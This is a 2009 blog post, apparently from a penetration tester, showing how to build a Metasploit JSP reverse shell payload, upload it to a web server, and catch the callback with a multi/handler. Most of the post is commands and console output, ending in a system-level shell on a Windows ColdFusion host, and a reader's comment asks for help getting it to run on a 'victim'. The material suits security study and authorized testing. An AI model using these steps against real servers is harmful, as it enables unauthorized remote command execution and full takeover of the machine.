Thursday, October 22, 2009

Metasploit JSP Shells


Stephen Fewer has pushed up a jsp reverse and jsp bind shell.

http://dev.metasploit.com/redmine/projects/framework/repository/show/modules/payloads/singles/java

I'm not sure of all the ways to use them but the easiest way is to just output the shell to raw and just upload it to a web server or for an example with an exploit check out the adobe robohelp exploit.

http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/http/adobe_robohelper_authbypass.rb


yomomma@c0:~/pentest/msf3.3dev$ ./msfpayload java/jsp_shell_reverse_tcp LHOST=192.168.10.1 R > blah.jsp

From there you can set up your multi handler, browse to your page webpath/blah.jsp and grab your shell.

yomomma@c0:~/pentest/msf3.3dev$ ./msfconsole
=[ msf v3.3-dev [core:3.3 api:1.0]

+ -- --=[ 432 exploits - 261 payloads

+ -- --=[ 21 encoders - 8 nops

=[ 222 aux



msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD java/jsp_shell_reverse_tcp

set PAYLOAD java/jsp_shell_reverse_tcp

msf exploit(handler) > set LHOST 192.168.10.1

LHOST => 192.168.10.1

msf exploit(handler) > info


Name: Generic Payload Handler

Version: 6558

Platform: Windows, Linux, Solaris, Unix, OSX, BSD, PHP

Privileged: No

License: Metasploit Framework License (BSD)


Provided by:
hdm

Available targets:

Id Name

-- ----

0 Wildcard Target


Payload information:

Space: 100000

Avoid: 0 characters



Description:

This module is a stub that provides all of the features of the

Metasploit payload system to exploits that have been launched

outside of the framework.


msf exploit(handler) > show options


Module options:


Name Current Setting Required Description

---- --------------- -------- -----------



Payload options (java/jsp_shell_reverse_tcp):


Name Current Setting Required Description

---- --------------- -------- -----------
LHOST 192.168.10.1 yes The local address
LPORT 4444 yes The local port
SHELL cmd.exe yes The system shell to use.


Exploit target:

Id Name
-- ----
0 Wildcard Target


msf exploit(handler) > exploit

[*] Starting the payload handler...

[*] Started reverse handler

[*] Command shell session 1 opened ( 192.168.10.1:4444 -> 192.168.10.2:42957)

Microsoft Windows [Version 5.2.3790]

(C) Copyright 1985-2003 Microsoft Corp.


C:\ColdFusion8\runtime\bin>
whoami
whoami

nt authority\system


C:\ColdFusion8\runtime\bin>
exit
exit


[*] Command shell session 1 closed.
CG

2 comments:

Fukad said...

Hi! I just have to say great work on thos blog!. This is the first time i got some problems, getting this to work, i start the payload and the multi handler. Upload the blah.jsp to my webserver. But when i try to connect with my "victim" machine to
"webserver/blah.jsp" i only get the "download window" opened. or in Firefox i get the source code to the .jsp.

What am i doing wrong? should i make a (tag)cript language="javaScript"(tag)(blah.jsp) source code(tag)/script(tag)? or what? Keep up the good work, Peace

CG said...

does the webserver know how to handle .jsp pages?